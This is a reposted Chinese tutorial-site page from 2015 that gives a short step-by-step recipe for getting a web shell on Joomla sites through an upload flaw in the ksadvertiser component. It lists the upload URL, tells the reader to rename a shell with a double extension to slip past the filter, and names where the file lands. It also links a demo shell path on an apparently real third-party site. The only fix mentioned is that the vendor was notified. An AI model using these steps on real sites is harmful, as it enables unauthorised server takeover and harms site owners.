网站地图    收藏   

主页 > 后端 > 网站安全 >

Joomla远程上传漏洞 可直接getshell - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 作者:13371. 有些joomal需要先注册.http://site/index.php?option=com_userview=login2. 到上传地址http://www.2cto.com /index.php?option=com_ksadvertiserItemid=36task=addcatid=0lang=en3. 点击i......

作者:1337
 
1.  有些joomal需要先注册.
 
http://site/index.php?option=com_user&view=login
 
2.  到上传地址
 
http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
 
3.  点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.
 
4.  上传后的文件在/ images/ksadvertiser/U0 这个目录下.
 
http://site/images/ksadvertiser/U0/adm1n.php.gif
 
Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif

修复:
已通知官方

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论